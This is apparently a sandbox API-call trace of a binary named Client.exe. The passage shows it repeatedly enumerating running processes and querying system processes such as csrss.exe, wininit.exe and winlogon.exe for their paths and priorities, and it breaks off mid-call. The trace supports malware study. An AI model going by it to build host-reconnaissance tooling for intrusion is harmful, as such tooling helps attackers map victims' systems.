[0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0289.109] GetProcAddress (hModule=0x769b0000, lpProcName="Module32FirstW") returned 0x769e79c1 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x9c472c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0289.109] GetProcAddress (hModule=0x769b0000, lpProcName="Module32NextW") returned 0x769e7d5e [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0289.109] GetProcAddress (hModule=0x769b0000, lpProcName="Module32FirstW") returned 0x769e79c1 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x9c472c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0289.109] GetProcAddress (hModule=0x769b0000, lpProcName="Module32NextW") returned 0x769e7d5e [0289.109] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.113] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.114] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.115] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.115] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0289.115] CloseHandle (hObject=0x170) returned 1 [0289.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.115] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.116] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\smss.exe", lpdwSize=0x18fd48) returned 1 [0289.118] CloseHandle (hObject=0x170) returned 1 [0289.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\smss.exe", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0289.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\smss.exe", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0289.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\smss.exe", cchWideChar=28, lpMultiByteStr=0x9d92a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\smss.exe", lpUsedDefaultChar=0x0) returned 28 [0289.119] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.119] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\smss.exe", lpdwSize=0x18fd40) returned 1 [0289.122] CloseHandle (hObject=0x170) returned 1 [0289.122] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.122] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\smss.exe", lpdwSize=0x18fd48) returned 1 [0289.125] CloseHandle (hObject=0x170) returned 1 [0289.125] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.125] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\smss.exe", lpdwSize=0x18fd48) returned 1 [0289.128] CloseHandle (hObject=0x170) returned 1 [0289.128] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.128] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.128] CloseHandle (hObject=0x170) returned 1 [0289.128] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.128] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd44) returned 1 [0289.130] CloseHandle (hObject=0x170) returned 1 [0289.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.134] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.135] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.136] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.137] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0289.251] CloseHandle (hObject=0x170) returned 1 [0289.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.251] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.251] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.254] CloseHandle (hObject=0x170) returned 1 [0289.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x9e07d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\csrss.exe", lpUsedDefaultChar=0x0) returned 29 [0289.254] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.254] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd40) returned 1 [0289.257] CloseHandle (hObject=0x170) returned 1 [0289.257] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.258] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.260] CloseHandle (hObject=0x170) returned 1 [0289.260] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x14c) returned 0x170 [0289.260] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.264] CloseHandle (hObject=0x170) returned 1 [0289.264] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.264] GetPriorityClass (hProcess=0x170) returned 0x80 [0289.265] CloseHandle (hObject=0x170) returned 1 [0289.265] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.265] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18fd44) returned 1 [0289.268] CloseHandle (hObject=0x170) returned 1 [0289.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.272] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.273] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.274] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.275] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.275] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0289.276] CloseHandle (hObject=0x170) returned 1 [0289.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.277] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.277] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18fd48) returned 1 [0289.280] CloseHandle (hObject=0x170) returned 1 [0289.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x9e0808, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\wininit.exe", lpUsedDefaultChar=0x0) returned 31 [0289.280] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.280] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18fd40) returned 1 [0289.283] CloseHandle (hObject=0x170) returned 1 [0289.283] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.283] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18fd48) returned 1 [0289.286] CloseHandle (hObject=0x170) returned 1 [0289.286] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.286] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18fd48) returned 1 [0289.289] CloseHandle (hObject=0x170) returned 1 [0289.289] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.289] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.289] CloseHandle (hObject=0x170) returned 1 [0289.289] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.289] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd44) returned 1 [0289.292] CloseHandle (hObject=0x170) returned 1 [0289.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.411] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.412] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.412] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.413] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.414] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.415] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x168) returned 0x0 [0289.416] CloseHandle (hObject=0x170) returned 1 [0289.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.416] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.416] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.420] CloseHandle (hObject=0x170) returned 1 [0289.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\csrss.exe", cchWideChar=29, lpMultiByteStr=0x9e0868, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\csrss.exe", lpUsedDefaultChar=0x0) returned 29 [0289.420] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.420] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd40) returned 1 [0289.423] CloseHandle (hObject=0x170) returned 1 [0289.424] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.424] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.426] CloseHandle (hObject=0x170) returned 1 [0289.426] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x17c) returned 0x170 [0289.426] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\csrss.exe", lpdwSize=0x18fd48) returned 1 [0289.428] CloseHandle (hObject=0x170) returned 1 [0289.428] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.428] GetPriorityClass (hProcess=0x170) returned 0x80 [0289.428] CloseHandle (hObject=0x170) returned 1 [0289.428] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.428] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\winlogon.exe", lpdwSize=0x18fd44) returned 1 [0289.430] CloseHandle (hObject=0x170) returned 1 [0289.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.434] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.434] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.435] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.436] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.436] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.437] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.438] Process32NextW (in: hSnapshot=0x170, 